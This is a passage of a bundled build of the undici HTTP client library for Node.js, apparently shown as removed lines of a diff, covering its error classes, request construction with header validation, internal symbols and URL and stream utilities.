((module) => { - -"use strict"; - - -class UndiciError extends Error { - constructor (message) { - super(message) - this.name = 'UndiciError' - this.code = 'UND_ERR' - } -} - -class ConnectTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ConnectTimeoutError) - this.name = 'ConnectTimeoutError' - this.message = message || 'Connect Timeout Error' - this.code = 'UND_ERR_CONNECT_TIMEOUT' - } -} - -class HeadersTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, HeadersTimeoutError) - this.name = 'HeadersTimeoutError' - this.message = message || 'Headers Timeout Error' - this.code = 'UND_ERR_HEADERS_TIMEOUT' - } -} - -class HeadersOverflowError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, HeadersOverflowError) - this.name = 'HeadersOverflowError' - this.message = message || 'Headers Overflow Error' - this.code = 'UND_ERR_HEADERS_OVERFLOW' - } -} - -class BodyTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, BodyTimeoutError) - this.name = 'BodyTimeoutError' - this.message = message || 'Body Timeout Error' - this.code = 'UND_ERR_BODY_TIMEOUT' - } -} - -class ResponseStatusCodeError extends UndiciError { - constructor (message, statusCode, headers, body) { - super(message) - Error.captureStackTrace(this, ResponseStatusCodeError) - this.name = 'ResponseStatusCodeError' - this.message = message || 'Response Status Code Error' - this.code = 'UND_ERR_RESPONSE_STATUS_CODE' - this.body = body - this.status = statusCode - this.statusCode = statusCode - this.headers = headers - } -} - -class InvalidArgumentError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InvalidArgumentError) - this.name = 'InvalidArgumentError' - this.message = message || 'Invalid Argument Error' - this.code = 'UND_ERR_INVALID_ARG' - } -} - -class InvalidReturnValueError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InvalidReturnValueError) - this.name = 'InvalidReturnValueError' - this.message = message || 'Invalid Return Value Error' - this.code = 'UND_ERR_INVALID_RETURN_VALUE' - } -} - -class RequestAbortedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, RequestAbortedError) - this.name = 'AbortError' - this.message = message || 'Request aborted' - this.code = 'UND_ERR_ABORTED' - } -} - -class InformationalError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InformationalError) - this.name = 'InformationalError' - this.message = message || 'Request information' - this.code = 'UND_ERR_INFO' - } -} - -class RequestContentLengthMismatchError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, RequestContentLengthMismatchError) - this.name = 'RequestContentLengthMismatchError' - this.message = message || 'Request body length does not match content-length header' - this.code = 'UND_ERR_REQ_CONTENT_LENGTH_MISMATCH' - } -} - -class ResponseContentLengthMismatchError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ResponseContentLengthMismatchError) - this.name = 'ResponseContentLengthMismatchError' - this.message = message || 'Response body length does not match content-length header' - this.code = 'UND_ERR_RES_CONTENT_LENGTH_MISMATCH' - } -} - -class ClientDestroyedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ClientDestroyedError) - this.name = 'ClientDestroyedError' - this.message = message || 'The client is destroyed' - this.code = 'UND_ERR_DESTROYED' - } -} - -class ClientClosedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ClientClosedError) - this.name = 'ClientClosedError' - this.message = message || 'The client is closed' - this.code = 'UND_ERR_CLOSED' - } -} - -class SocketError extends UndiciError { - constructor (message, socket) { - super(message) - Error.captureStackTrace(this, SocketError) - this.name = 'SocketError' - this.message = message || 'Socket error' - this.code = 'UND_ERR_SOCKET' - this.socket = socket - } -} - -class NotSupportedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, NotSupportedError) - this.name = 'NotSupportedError' - this.message = message || 'Not supported error' - this.code = 'UND_ERR_NOT_SUPPORTED' - } -} - -class BalancedPoolMissingUpstreamError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, NotSupportedError) - this.name = 'MissingUpstreamError' - this.message = message || 'No upstream has been added to the BalancedPool' - this.code = 'UND_ERR_BPL_MISSING_UPSTREAM' - } -} - -class HTTPParserError extends Error { - constructor (message, code, data) { - super(message) - Error.captureStackTrace(this, HTTPParserError) - this.name = 'HTTPParserError' - this.code = code ? `HPE_${code}` : undefined - this.data = data ? data.toString() : undefined - } -} - -class ResponseExceededMaxSizeError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ResponseExceededMaxSizeError) - this.name = 'ResponseExceededMaxSizeError' - this.message = message || 'Response content exceeded max size' - this.code = 'UND_ERR_RES_EXCEEDED_MAX_SIZE' - } -} - -class RequestRetryError extends UndiciError { - constructor (message, code, { headers, data }) { - super(message) - Error.captureStackTrace(this, RequestRetryError) - this.name = 'RequestRetryError' - this.message = message || 'Request retry error' - this.code = 'UND_ERR_REQ_RETRY' - this.statusCode = code - this.data = data - this.headers = headers - } -} - -module.exports = { - HTTPParserError, - UndiciError, - HeadersTimeoutError, - HeadersOverflowError, - BodyTimeoutError, - RequestContentLengthMismatchError, - ConnectTimeoutError, - ResponseStatusCodeError, - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError, - ClientDestroyedError, - ClientClosedError, - InformationalError, - SocketError, - NotSupportedError, - ResponseContentLengthMismatchError, - BalancedPoolMissingUpstreamError, - ResponseExceededMaxSizeError, - RequestRetryError -} - - -/***/ }), - -/***/ 2905: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - InvalidArgumentError, - NotSupportedError -} = __nccwpck_require__(8045) -const assert = __nccwpck_require__(9491) -const { kHTTP2BuildRequest, kHTTP2CopyHeaders, kHTTP1BuildRequest } = __nccwpck_require__(2785) -const util = __nccwpck_require__(3983) - -// tokenRegExp and headerCharRegex have been lifted from -// https://github.com/nodejs/node/blob/main/lib/_http_common.js - -/** - * Verifies that the given val is a valid HTTP token - * per the rules defined in RFC 7230 - * See https://tools.ietf.org/html/rfc7230#section-3.2.6 - */ -const tokenRegExp = /^[\^_`a-zA-Z\-0-9!#$%&'*+.|~]+$/ - -/** - * Matches if val contains an invalid field-vchar - * field-value = *( field-content / obs-fold ) - * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] - * field-vchar = VCHAR / obs-text - */ -const headerCharRegex = /[^\t\x20-\x7e\x80-\xff]/ - -// Verifies that a given path is valid does not contain control chars \x00 to \x20 -const invalidPathRegex = /[^\u0021-\u00ff]/ - -const kHandler = Symbol('handler') - -const channels = {} - -let extractBody - -try { - const diagnosticsChannel = __nccwpck_require__(7643) - channels.create = diagnosticsChannel.channel('undici:request:create') - channels.bodySent = diagnosticsChannel.channel('undici:request:bodySent') - channels.headers = diagnosticsChannel.channel('undici:request:headers') - channels.trailers = diagnosticsChannel.channel('undici:request:trailers') - channels.error = diagnosticsChannel.channel('undici:request:error') -} catch { - channels.create = { hasSubscribers: false } - channels.bodySent = { hasSubscribers: false } - channels.headers = { hasSubscribers: false } - channels.trailers = { hasSubscribers: false } - channels.error = { hasSubscribers: false } -} - -class Request { - constructor (origin, { - path, - method, - body, - headers, - query, - idempotent, - blocking, - upgrade, - headersTimeout, - bodyTimeout, - reset, - throwOnError, - expectContinue - }, handler) { - if (typeof path !== 'string') { - throw new InvalidArgumentError('path must be a string') - } else if ( - path[0] !== '/' && - !(path.startsWith('http://') || path.startsWith('https://')) && - method !== 'CONNECT' - ) { - throw new InvalidArgumentError('path must be an absolute URL or start with a slash') - } else if (invalidPathRegex.exec(path) !== null) { - throw new InvalidArgumentError('invalid request path') - } - - if (typeof method !== 'string') { - throw new InvalidArgumentError('method must be a string') - } else if (tokenRegExp.exec(method) === null) { - throw new InvalidArgumentError('invalid request method') - } - - if (upgrade && typeof upgrade !== 'string') { - throw new InvalidArgumentError('upgrade must be a string') - } - - if (headersTimeout != null && (!Number.isFinite(headersTimeout) || headersTimeout < 0)) { - throw new InvalidArgumentError('invalid headersTimeout') - } - - if (bodyTimeout != null && (!Number.isFinite(bodyTimeout) || bodyTimeout < 0)) { - throw new InvalidArgumentError('invalid bodyTimeout') - } - - if (reset != null && typeof reset !== 'boolean') { - throw new InvalidArgumentError('invalid reset') - } - - if (expectContinue != null && typeof expectContinue !== 'boolean') { - throw new InvalidArgumentError('invalid expectContinue') - } - - this.headersTimeout = headersTimeout - - this.bodyTimeout = bodyTimeout - - this.throwOnError = throwOnError === true - - this.method = method - - this.abort = null - - if (body == null) { - this.body = null - } else if (util.isStream(body)) { - this.body = body - - const rState = this.body._readableState - if (!rState || !rState.autoDestroy) { - this.endHandler = function autoDestroy () { - util.destroy(this) - } - this.body.on('end', this.endHandler) - } - - this.errorHandler = err => { - if (this.abort) { - this.abort(err) - } else { - this.error = err - } - } - this.body.on('error', this.errorHandler) - } else if (util.isBuffer(body)) { - this.body = body.byteLength ? body : null - } else if (ArrayBuffer.isView(body)) { - this.body = body.buffer.byteLength ? Buffer.from(body.buffer, body.byteOffset, body.byteLength) : null - } else if (body instanceof ArrayBuffer) { - this.body = body.byteLength ? Buffer.from(body) : null - } else if (typeof body === 'string') { - this.body = body.length ? Buffer.from(body) : null - } else if (util.isFormDataLike(body) || util.isIterable(body) || util.isBlobLike(body)) { - this.body = body - } else { - throw new InvalidArgumentError('body must be a string, a Buffer, a Readable stream, an iterable, or an async iterable') - } - - this.completed = false - - this.aborted = false - - this.upgrade = upgrade || null - - this.path = query ? util.buildURL(path, query) : path - - this.origin = origin - - this.idempotent = idempotent == null - ? method === 'HEAD' || method === 'GET' - : idempotent - - this.blocking = blocking == null ? false : blocking - - this.reset = reset == null ? null : reset - - this.host = null - - this.contentLength = null - - this.contentType = null - - this.headers = '' - - // Only for H2 - this.expectContinue = expectContinue != null ? expectContinue : false - - if (Array.isArray(headers)) { - if (headers.length % 2 !== 0) { - throw new InvalidArgumentError('headers array must be even') - } - for (let i = 0; i < headers.length; i += 2) { - processHeader(this, headers[i], headers[i + 1]) - } - } else if (headers && typeof headers === 'object') { - const keys = Object.keys(headers) - for (let i = 0; i < keys.length; i++) { - const key = keys[i] - processHeader(this, key, headers[key]) - } - } else if (headers != null) { - throw new InvalidArgumentError('headers must be an object or an array') - } - - if (util.isFormDataLike(this.body)) { - if (util.nodeMajor < 16 || (util.nodeMajor === 16 && util.nodeMinor < 8)) { - throw new InvalidArgumentError('Form-Data bodies are only supported in node v16.8 and newer.') - } - - if (!extractBody) { - extractBody = (__nccwpck_require__(1472).extractBody) - } - - const [bodyStream, contentType] = extractBody(body) - if (this.contentType == null) { - this.contentType = contentType - this.headers += `content-type: ${contentType}\r\n` - } - this.body = bodyStream.stream - this.contentLength = bodyStream.length - } else if (util.isBlobLike(body) && this.contentType == null && body.type) { - this.contentType = body.type - this.headers += `content-type: ${body.type}\r\n` - } - - util.validateHandler(handler, method, upgrade) - - this.servername = util.getServerName(this.host) - - this[kHandler] = handler - - if (channels.create.hasSubscribers) { - channels.create.publish({ request: this }) - } - } - - onBodySent (chunk) { - if (this[kHandler].onBodySent) { - try { - return this[kHandler].onBodySent(chunk) - } catch (err) { - this.abort(err) - } - } - } - - onRequestSent () { - if (channels.bodySent.hasSubscribers) { - channels.bodySent.publish({ request: this }) - } - - if (this[kHandler].onRequestSent) { - try { - return this[kHandler].onRequestSent() - } catch (err) { - this.abort(err) - } - } - } - - onConnect (abort) { - assert(!this.aborted) - assert(!this.completed) - - if (this.error) { - abort(this.error) - } else { - this.abort = abort - return this[kHandler].onConnect(abort) - } - } - - onHeaders (statusCode, headers, resume, statusText) { - assert(!this.aborted) - assert(!this.completed) - - if (channels.headers.hasSubscribers) { - channels.headers.publish({ request: this, response: { statusCode, headers, statusText } }) - } - - try { - return this[kHandler].onHeaders(statusCode, headers, resume, statusText) - } catch (err) { - this.abort(err) - } - } - - onData (chunk) { - assert(!this.aborted) - assert(!this.completed) - - try { - return this[kHandler].onData(chunk) - } catch (err) { - this.abort(err) - return false - } - } - - onUpgrade (statusCode, headers, socket) { - assert(!this.aborted) - assert(!this.completed) - - return this[kHandler].onUpgrade(statusCode, headers, socket) - } - - onComplete (trailers) { - this.onFinally() - - assert(!this.aborted) - - this.completed = true - if (channels.trailers.hasSubscribers) { - channels.trailers.publish({ request: this, trailers }) - } - - try { - return this[kHandler].onComplete(trailers) - } catch (err) { - // TODO (fix): This might be a bad idea? - this.onError(err) - } - } - - onError (error) { - this.onFinally() - - if (channels.error.hasSubscribers) { - channels.error.publish({ request: this, error }) - } - - if (this.aborted) { - return - } - this.aborted = true - - return this[kHandler].onError(error) - } - - onFinally () { - if (this.errorHandler) { - this.body.off('error', this.errorHandler) - this.errorHandler = null - } - - if (this.endHandler) { - this.body.off('end', this.endHandler) - this.endHandler = null - } - } - - // TODO: adjust to support H2 - addHeader (key, value) { - processHeader(this, key, value) - return this - } - - static [kHTTP1BuildRequest] (origin, opts, handler) { - // TODO: Migrate header parsing here, to make Requests - // HTTP agnostic - return new Request(origin, opts, handler) - } - - static [kHTTP2BuildRequest] (origin, opts, handler) { - const headers = opts.headers - opts = { ...opts, headers: null } - - const request = new Request(origin, opts, handler) - - request.headers = {} - - if (Array.isArray(headers)) { - if (headers.length % 2 !== 0) { - throw new InvalidArgumentError('headers array must be even') - } - for (let i = 0; i < headers.length; i += 2) { - processHeader(request, headers[i], headers[i + 1], true) - } - } else if (headers && typeof headers === 'object') { - const keys = Object.keys(headers) - for (let i = 0; i < keys.length; i++) { - const key = keys[i] - processHeader(request, key, headers[key], true) - } - } else if (headers != null) { - throw new InvalidArgumentError('headers must be an object or an array') - } - - return request - } - - static [kHTTP2CopyHeaders] (raw) { - const rawHeaders = raw.split('\r\n') - const headers = {} - - for (const header of rawHeaders) { - const [key, value] = header.split(': ') - - if (value == null || value.length === 0) continue - - if (headers[key]) headers[key] += `,${value}` - else headers[key] = value - } - - return headers - } -} - -function processHeaderValue (key, val, skipAppend) { - if (val && typeof val === 'object') { - throw new InvalidArgumentError(`invalid ${key} header`) - } - - val = val != null ? `${val}` : '' - - if (headerCharRegex.exec(val) !== null) { - throw new InvalidArgumentError(`invalid ${key} header`) - } - - return skipAppend ? val : `${key}: ${val}\r\n` -} - -function processHeader (request, key, val, skipAppend = false) { - if (val && (typeof val === 'object' && !Array.isArray(val))) { - throw new InvalidArgumentError(`invalid ${key} header`) - } else if (val === undefined) { - return - } - - if ( - request.host === null && - key.length === 4 && - key.toLowerCase() === 'host' - ) { - if (headerCharRegex.exec(val) !== null) { - throw new InvalidArgumentError(`invalid ${key} header`) - } - // Consumed by Client - request.host = val - } else if ( - request.contentLength === null && - key.length === 14 && - key.toLowerCase() === 'content-length' - ) { - request.contentLength = parseInt(val, 10) - if (!Number.isFinite(request.contentLength)) { - throw new InvalidArgumentError('invalid content-length header') - } - } else if ( - request.contentType === null && - key.length === 12 && - key.toLowerCase() === 'content-type' - ) { - request.contentType = val - if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) - else request.headers += processHeaderValue(key, val) - } else if ( - key.length === 17 && - key.toLowerCase() === 'transfer-encoding' - ) { - throw new InvalidArgumentError('invalid transfer-encoding header') - } else if ( - key.length === 10 && - key.toLowerCase() === 'connection' - ) { - const value = typeof val === 'string' ? val.toLowerCase() : null - if (value !== 'close' && value !== 'keep-alive') { - throw new InvalidArgumentError('invalid connection header') - } else if (value === 'close') { - request.reset = true - } - } else if ( - key.length === 10 && - key.toLowerCase() === 'keep-alive' - ) { - throw new InvalidArgumentError('invalid keep-alive header') - } else if ( - key.length === 7 && - key.toLowerCase() === 'upgrade' - ) { - throw new InvalidArgumentError('invalid upgrade header') - } else if ( - key.length === 6 && - key.toLowerCase() === 'expect' - ) { - throw new NotSupportedError('expect header not supported') - } else if (tokenRegExp.exec(key) === null) { - throw new InvalidArgumentError('invalid header key') - } else { - if (Array.isArray(val)) { - for (let i = 0; i < val.length; i++) { - if (skipAppend) { - if (request.headers[key]) request.headers[key] += `,${processHeaderValue(key, val[i], skipAppend)}` - else request.headers[key] = processHeaderValue(key, val[i], skipAppend) - } else { - request.headers += processHeaderValue(key, val[i]) - } - } - } else { - if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) - else request.headers += processHeaderValue(key, val) - } - } -} - -module.exports = Request - - -/***/ }), - -/***/ 2785: -/***/ ((module) => { - -module.exports = { - kClose: Symbol('close'), - kDestroy: Symbol('destroy'), - kDispatch: Symbol('dispatch'), - kUrl: Symbol('url'), - kWriting: Symbol('writing'), - kResuming: Symbol('resuming'), - kQueue: Symbol('queue'), - kConnect: Symbol('connect'), - kConnecting: Symbol('connecting'), - kHeadersList: Symbol('headers list'), - kKeepAliveDefaultTimeout: Symbol('default keep alive timeout'), - kKeepAliveMaxTimeout: Symbol('max keep alive timeout'), - kKeepAliveTimeoutThreshold: Symbol('keep alive timeout threshold'), - kKeepAliveTimeoutValue: Symbol('keep alive timeout'), - kKeepAlive: Symbol('keep alive'), - kHeadersTimeout: Symbol('headers timeout'), - kBodyTimeout: Symbol('body timeout'), - kServerName: Symbol('server name'), - kLocalAddress: Symbol('local address'), - kHost: Symbol('host'), - kNoRef: Symbol('no ref'), - kBodyUsed: Symbol('used'), - kRunning: Symbol('running'), - kBlocking: Symbol('blocking'), - kPending: Symbol('pending'), - kSize: Symbol('size'), - kBusy: Symbol('busy'), - kQueued: Symbol('queued'), - kFree: Symbol('free'), - kConnected: Symbol('connected'), - kClosed: Symbol('closed'), - kNeedDrain: Symbol('need drain'), - kReset: Symbol('reset'), - kDestroyed: Symbol.for('nodejs.stream.destroyed'), - kMaxHeadersSize: Symbol('max headers size'), - kRunningIdx: Symbol('running index'), - kPendingIdx: Symbol('pending index'), - kError: Symbol('error'), - kClients: Symbol('clients'), - kClient: Symbol('client'), - kParser: Symbol('parser'), - kOnDestroyed: Symbol('destroy callbacks'), - kPipelining: Symbol('pipelining'), - kSocket: Symbol('socket'), - kHostHeader: Symbol('host header'), - kConnector: Symbol('connector'), - kStrictContentLength: Symbol('strict content length'), - kMaxRedirections: Symbol('maxRedirections'), - kMaxRequests: Symbol('maxRequestsPerClient'), - kProxy: Symbol('proxy agent options'), - kCounter: Symbol('socket request counter'), - kInterceptors: Symbol('dispatch interceptors'), - kMaxResponseSize: Symbol('max response size'), - kHTTP2Session: Symbol('http2Session'), - kHTTP2SessionState: Symbol('http2Session state'), - kHTTP2BuildRequest: Symbol('http2 build request'), - kHTTP1BuildRequest: Symbol('http1 build request'), - kHTTP2CopyHeaders: Symbol('http2 copy headers'), - kHTTPConnVersion: Symbol('http connection version'), - kRetryHandlerDefaultRetry: Symbol('retry agent default retry'), - kConstruct: Symbol('constructable') -} - - -/***/ }), - -/***/ 3983: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { kDestroyed, kBodyUsed } = __nccwpck_require__(2785) -const { IncomingMessage } = __nccwpck_require__(3685) -const stream = __nccwpck_require__(2781) -const net = __nccwpck_require__(1808) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { Blob } = __nccwpck_require__(4300) -const nodeUtil = __nccwpck_require__(3837) -const { stringify } = __nccwpck_require__(3477) - -const [nodeMajor, nodeMinor] = process.versions.node.split('.').map(v => Number(v)) - -function nop () {} - -function isStream (obj) { - return obj && typeof obj === 'object' && typeof obj.pipe === 'function' && typeof obj.on === 'function' -} - -// based on https://github.com/node-fetch/fetch-blob/blob/8ab587d34080de94140b54f07168451e7d0b655e/index.js#L229-L241 (MIT License) -function isBlobLike (object) { - return (Blob && object instanceof Blob) || ( - object && - typeof object === 'object' && - (typeof object.stream === 'function' || - typeof object.arrayBuffer === 'function') && - /^(Blob|File)$/.test(object[Symbol.toStringTag]) - ) -} - -function buildURL (url, queryParams) { - if (url.includes('?') || url.includes('#')) { - throw new Error('Query params cannot be passed when url already contains "?" or "#".') - } - - const stringified = stringify(queryParams) - - if (stringified) { - url += '?' + stringified - } - - return url -} - -function parseURL (url) { - if (typeof url === 'string') { - url = new URL(url) - - if (!/^https?:/.test(url.origin || url.protocol)) { - throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') - } - - return url - } - - if (!url || typeof url !== 'object') { - throw new InvalidArgumentError('Invalid URL: The URL argument must be a non-null object.') - } - - if (!/^https?:/.test(url.origin || url.protocol)) { - throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') - } - - if (!(url instanceof URL)) { - if (url.port != null && url.port !== '' && !Number.isFinite(parseInt(url.port))) { - throw new InvalidArgumentError('Invalid URL: port must be a valid integer or a string representation of an integer.') - } - - if (url.path != null && typeof url.path !== 'string') { - throw new InvalidArgumentError('Invalid URL path: the path must be a string or null/undefined.') - } - - if (url.pathname != null && typeof url.pathname !== 'string') { - throw new InvalidArgumentError('Invalid URL pathname: the pathname must be a string or null/undefined.') - } - - if (url.hostname != null && typeof url.hostname !== 'string') { - throw new InvalidArgumentError('Invalid URL hostname: the hostname must be a string or null/undefined.') - } - - if (url.origin != null && typeof url.origin !== 'string') { - throw new InvalidArgumentError('Invalid URL origin: the origin must be a string or null/undefined.') - } - - const port = url.port != null - ? url.port - : (url.protocol === 'https:' ? 443 : 80) - let origin = url.origin != null - ? url.origin - : `${url.protocol}//${url.hostname}:${port}` - let path = url.path != null - ? url.path - : `${url.pathname || ''}${url.search || ''}` - - if (origin.endsWith('/')) { - origin = origin.substring(0, origin.length - 1) - } - - if (path && !path.startsWith('/')) { - path = `/${path}` - } - // new URL(path, origin) is unsafe when `path` contains an absolute URL - // From https://developer.mozilla.org/en-US/docs/Web/API/URL/URL: - // If first parameter is a relative URL, second param is required, and will be used as the base URL. - // If first parameter is an absolute URL, a given second param will be ignored. - url = new URL(origin + path) - } - - return url -} - -function parseOrigin (url) { - url = parseURL(url) - - if (url.pathname !== '/' || url.search || url.hash) { - throw new InvalidArgumentError('invalid url') - } - - return url -} - -function getHostname (host) { - if (host[0] === '[') { - const idx = host.indexOf(']') - - assert(idx !== -1) - return host.substring(1, idx) - } - - const idx = host.indexOf(':') - if (idx === -1) return host - - return host.substring(0, idx) -} - -// IP addresses are not valid server names per RFC6066 -// > Currently, the only server names supported are DNS hostnames -function getServerName (host) { - if (!host) { - return null - } - - assert.strictEqual(typeof host, 'string') - - const servername = getHostname(host) - if (net.isIP(servername)) { - return '' - } - - return servername -} - -function deepClone (obj) { - return JSON.parse(JSON.stringify(obj)) -} - -function isAsyncIterable (obj) { - return !!(obj != null && typeof obj[Symbol.asyncIterator] === 'function') -} - -function isIterable (obj) { - return !!(obj != null && (typeof obj[Symbol.iterator] === 'function' || typeof obj[Symbol.asyncIterator] === 'function')) -} - -function bodyLength (body) { - if (body == null) { - return 0 - } else if (isStream(body)) { - const state = body._readableState - return state && state.objectMode === false && state.ended === true && Number.isFinite(state.length) - ? state.length - : null - } else if (isBlobLike(body)) { - return body.size != null ? body.size : null - } else if (isBuffer(body)) { - return body.byteLength - } - - return null -} - -function isDestroyed (stream) { - return !stream || !!(stream.destroyed || stream[kDestroyed]) -} - -function isReadableAborted (stream) { - const state = stream && stream._readableState - return isDestroyed(stream) && state && !state.endEmitted -} - -function destroy (stream, err) { - if (stream == null || !isStream(stream) || isDestroyed(stream)) { - return - } - - if (typeof stream.destroy === 'function') { - if (Object.getPrototypeOf(stream).constructor === IncomingMessage) { - // See: https://github.com/nodejs/node/pull/38505/files - stream.socket = null - } - - stream.destroy(err) - } else if (err) { - process.nextTick((stream, err) => { - stream.emit('error', err) - }, stream, err) - } - - if (stream.destroyed !== true) { - stream[kDestroyed] = true - } -} - -const KEEPALIVE_TIMEOUT_EXPR = /timeout=(\d+)/ -function parseKeepAliveTimeout (val) { - const m = val.toString().match(KEEPALIVE_TIMEOUT_EXPR) - return m ? parseInt(m[1], 10) * 1000 : null -} - -function parseHeaders (headers, obj = {}) { - // For H2 support - if (!Array.isArray(headers)) return headers - - for (let i = 0; i < headers.length; i += 2) { - const key = headers[i].toString().toLowerCase() - let val = obj[key] - - if (!val) { - if (Array.isArray(headers[i + 1])) { - obj[key] = headers[i + 1].map(x => x.toString('utf8')) - } else { - obj[key] = headers[i + 1].toString('utf8') - } - } else { - if (!Array.isArray(val)) { - val = [val] - obj[key] = val - } - val.push(headers[i + 1].toString('utf8')) - } - } - - // See https://github.com/nodejs/node/pull/46528 - if ('content-length' in obj && 'content-disposition' in obj) { - obj['content-disposition'] = Buffer.from(obj['content-disposition']).toString('latin1') - } - - return obj -} - -function parseRawHeaders (headers) { - const ret = [] - let hasContentLength = false - let contentDispositionIdx = -1 - - for (let n = 0; n < headers.length; n += 2) { - const key = headers[n + 0].toString() - const val = headers[n + 1].toString('utf8') - - if (key.length === 14 && (key === 'content-length' || key.toLowerCase() === 'content-length')) { - ret.push(key, val) - hasContentLength = true - } else if (key.length === 19 && (key === 'content-disposition' || key.toLowerCase() === 'content-disposition')) { - contentDispositionIdx = ret.push(key, val) - 1 - } else { - ret.push(key, val) - } - } - - // See https://github.com/nodejs/node/pull/46528 - if (hasContentLength && contentDispositionIdx !== -1) { - ret[contentDispositionIdx] = Buffer.from(ret[contentDispositionIdx]).toString('latin1') - } - - return ret -} - -function isBuffer (buffer) { - // See, https://github.com/mcollina/undici/pull/319 - return buffer instanceof Uint8Array || Buffer.isBuffer(buffer) -} - -function validateHandler (handler, method, upgrade) { - if (!handler || typeof handler !== 'object') { - throw new InvalidArgumentError('handler must be an object') - } - - if (typeof handler.onConnect !== 'function') { - throw new InvalidArgumentError('invalid onConnect method') - } - - if (typeof handler.onError !== 'function') { - throw new InvalidArgumentError('invalid onError method') - } - - if (typeof handler.onBodySent !== 'function' && handler.onBodySent !== undefined) { - throw new InvalidArgumentError('invalid onBodySent method') - } - - if (upgrade || method === 'CONNECT') { - if (typeof handler.onUpgrade !== 'function') { - throw new InvalidArgumentError('invalid onUpgrade method') - } - } else { - if (typeof handler.onHeaders !== 'function') { - throw new InvalidArgumentError('invalid onHeaders method') - } - - if (typeof handler.onData !== 'function') { - throw new InvalidArgumentError('invalid onData method') - } - - if (typeof handler.onComplete !== 'function') { - throw new InvalidArgumentError('invalid onComplete method') - } - } -} - -// A body is disturbed if it has been read from and it cannot -// be re-used without losing state or data. -function isDisturbed (body) { - return !!(body && ( - stream.isDisturbed - ? stream.isDisturbed(body) || body[kBodyUsed] // TODO (fix): Why is body[kBodyUsed] needed? - : body[kBodyUsed] || - body.readableDidRead || - (body._readableState && body._readableState.dataEmitted) || - isReadableAborted(body) - )) -} - -function isErrored (body) { - return !!(body && ( - stream.isErrored - ? stream.isErrored(body) - : /state: 'errored'/.test(nodeUtil.inspect(body) - ))) -} - -function isReadable (body) { - return !!(body && ( - stream.isReadable - ? stream.isReadable(body) - : /state: 'readable'/.test(nodeUtil.inspect(body) - ))) -} - -function getSocketInfo (socket) { - return { - localAddress: socket.localAddress, - localPort: socket.localPort, - remoteAddress: socket.remoteAddress, - remotePort: socket.remotePort, - remoteFamily: socket.remoteFamily, - timeout: socket.timeout, - bytesWritten: socket.bytesWritten, - bytesRead: socket.bytesRead - } -} - -async function * convertIterableToBuffer (iterable) { - for await (const chunk of iterable) { - yield Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk) - } -} - -let ReadableStream -function ReadableStreamFrom (iterable) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - if (ReadableStream.from) { - return ReadableStream.from(convertIterableToBuffer(iterable)) - } - - let iterator - return new ReadableStream( - { - async start () { - iterator = iterable[Symbol.asyncIterator]() - }, - async pull (controller) { - const { done, value } = await iterator.next() - if (done) { - queueMicrotask(() => { - controller.close() - }) - } else { - const buf = Buffer.isBuffer(value) ? value : Buffer.from(value) - controller.enqueue(new Uint8Array(buf)) - } - return controller.desiredSize > 0 - }, - async cancel (reason) { - await iterator.return() - } - }, - 0 - ) -} - -// The chunk should be a FormData instance and contains -// all the required methods. -function isFormDataLike (object) { - return ( - object && - typeof object === 'object' && - typeof object.append === 'function' && - typeof object.delete === 'function' && - typeof object.get === 'function' && - typeof object.getAll === 'function' && - typeof object.has === 'function' && - typeof object.set === 'function' && - object[Symbol.toStringTag] === 'FormData' - ) -} - -function throwIfAborted (signal) { - if (!signal) { return } - if (typeof signal.throwIfAborted === 'function') { - signal.throwIfAborted() - } else { - if (signal.aborted) { - // DOMException not available < v17.0.0 - const err = new Error('The operation was aborted') - err.name = 'AbortError' - throw err - } - } -} - -function addAbortListener (signal, listener) { - if ('addEventListener' in signal) { - signal.addEventListener('abort', listener, { once: true }) - return () => signal.removeEventListener('abort', listener) - } - signal.addListener('abort', listener) - return () => signal.removeListener('abort', listener) -} - -const hasToWellFormed = !!String.prototype.toWellFormed - -/** - * @param {string} val - */ -function toUSVString (val) { - if (hasToWellFormed) { - return `${val}`.toWellFormed() - } else if (nodeUtil.toUSVString) { - return nodeUtil.toUSVString(val) - } - - return `${val}` -} - -// Parsed accordingly to RFC 9110 -// https://www.rfc-editor.org/rfc/rfc9110#field.content-range -function parseRangeHeader (range) { - if (range == null || range === '') return { start: 0, end: null, size: null } - - const m = range ? range.match(/^bytes (\d+)-(\d+)\/(\d+)?$/) : null - return m - ? { - start: parseInt(m[1]), - end: m[2] ? parseInt(m[2]) : null, - size: m[3] ? parseInt(m[3]) : null - } - : null -} - -const kEnumerableProperty = Object.create(null) -kEnumerableProperty.enumerable = true - -module.exports = { - kEnumerableProperty, - nop, - isDisturbed, - isErrored, - isReadable, - toUSVString, - isReadableAborted, - isBlobLike, - parseOrigin, - parseURL, - getServerName, - isStream, - isIterable, - isAsyncIterable, - isDestroyed, - parseRawHeaders, - parseHeaders, - parseKeepAliveTimeout, - destroy, - bodyLength, - deepClone, - ReadableStreamFrom, - isBuffer, - 